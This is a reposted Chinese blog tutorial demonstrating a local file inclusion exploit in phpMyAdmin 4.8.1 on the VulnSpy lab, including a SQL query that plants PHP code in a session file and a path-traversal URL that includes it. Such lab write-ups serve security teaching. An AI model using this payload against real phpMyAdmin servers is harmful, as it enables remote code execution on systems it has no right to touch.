碼上快樂

相關內容    簡體    繁體

phpMyAdmin 4.8.x 本地文件包含漏洞利用

本文轉載自   查看原文   2018-08-23 20:02   1723    代碼審計

phpMyAdmin 4.8.x 本地文件包含漏洞利用

今天ChaMd5安全團隊公開了一個phpMyAdmin最新版中的本地文件包含漏洞:phpmyadmin4.8.1后台getshell。該漏洞利用不要求root帳號,只需能夠登錄 phpMyAdmin 便能夠利用。

在這篇文章中我們將使用VulnSpy的在線 phpMyAdmin 環境來演示該漏洞的利用。

VulnSpy 在線 phpMyAdmin 環境地址:http://www.vulnspy.com/phpmyadmin-4.8.1/

漏洞細節

參照ChaMd5安全團隊發布的文章:phpmyadmin4.8.1后台getshell

漏洞利用

因為原文中包含數據庫文件可能由於文件權限或者帳號權限不足而無法利用,這里我們將使用另外一種方式來利用該文件包含漏洞,即包含session文件。

1. 進入VulnSpy 在線 phpMyAdmin 環境地址,點擊 Start to Hack ,跳轉到VSPlate

VulnSpy

2. 等待載入設置后,點擊 GO 按鈕開啟實驗

VulnSpy

3. 實驗創建完成后,點擊演示地址進入實驗

VulnSpy

4. 使用帳號 root ,密碼 toor 登錄 phpMyAdmin

VulnSpy

5. 點擊頂部導航欄中的SQL按鈕,執行SQL查詢

select '<?php phpinfo();exit;?>'

VulnSpy

6. 獲取自己的SESSION ID

你的 SESSION ID 為 Cookie 中的 phpMyAdmin 項。

VulnSpy

這樣對應的SESSION文件為/var/lib/php/sessions/sess_你的SESSION ID

7. 包含SESSION文件,成功利用該漏洞

http://1a23009a9c9e959d9c70932bb9f634eb.vsplate.me/index.php?target=db_sql.php%253f/../../../../../../../../var/lib/php/sessions/sess_11njnj4253qq93vjm9q93nvc7p2lq82k

VulnSpy

GitHub 源碼

https://github.com/vulnspy/phpmyadmin-4.8.1

參考

【首發】phpmyadmin4.8.1后台getshell
phpMyAdmin 4.8.x LFI to RCE (Authorization Required) - https://blog.vulnspy.com/2018/06/21/phpMyAdmin-4-8-x-Authorited-CLI-to-RCE/


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



猜您在找 關於Discuz! X系列UC_Server 本地文件包含漏洞 PhpMyAdmin漏洞利用匯總 thinkphp 5.x~3.x 文件包含漏洞分析 phpMyAdmin后台文件包含溯源 18.phpmyadmin 4.8.1 遠程文件包含漏洞(CVE-2018-12613) 詳解文件包含漏洞 文件包含漏洞 常見的文件包含漏洞 文件包含漏洞小結 文件包含漏洞(pikachu)
 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM